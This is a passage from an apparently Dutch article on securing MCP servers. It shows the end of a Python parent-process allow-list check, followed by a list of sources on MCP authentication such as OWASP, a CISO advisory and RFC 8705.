raise SystemExit(
f"Unauthorized parent process: {exe}. "
f"Allowed: {ALLOWED_PARENTS}"
)
logger.info("Parent process verified: %s (PID %d)", exe, os.getppid())Bronnen
- VulnerableMCP Project: Systematische scan van 500+ publieke MCP-servers waaruit blijkt dat 38% geen authenticatie heeft
- eSentire CISO Advisory: "Securing MCP Deployments" -- enterprise-richtlijnen voor MCP-authenticatie
- MCP Specification: Model Context Protocol -- secties over transport en sessiebeheer
- OWASP ASI: Agentic Security Initiative -- vereisten voor authenticatie en toegangscontrole
- Pomerium: "Zero Trust for MCP" -- proxy-gebaseerde authenticatie voor MCP-servers
- RFC 8705: OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens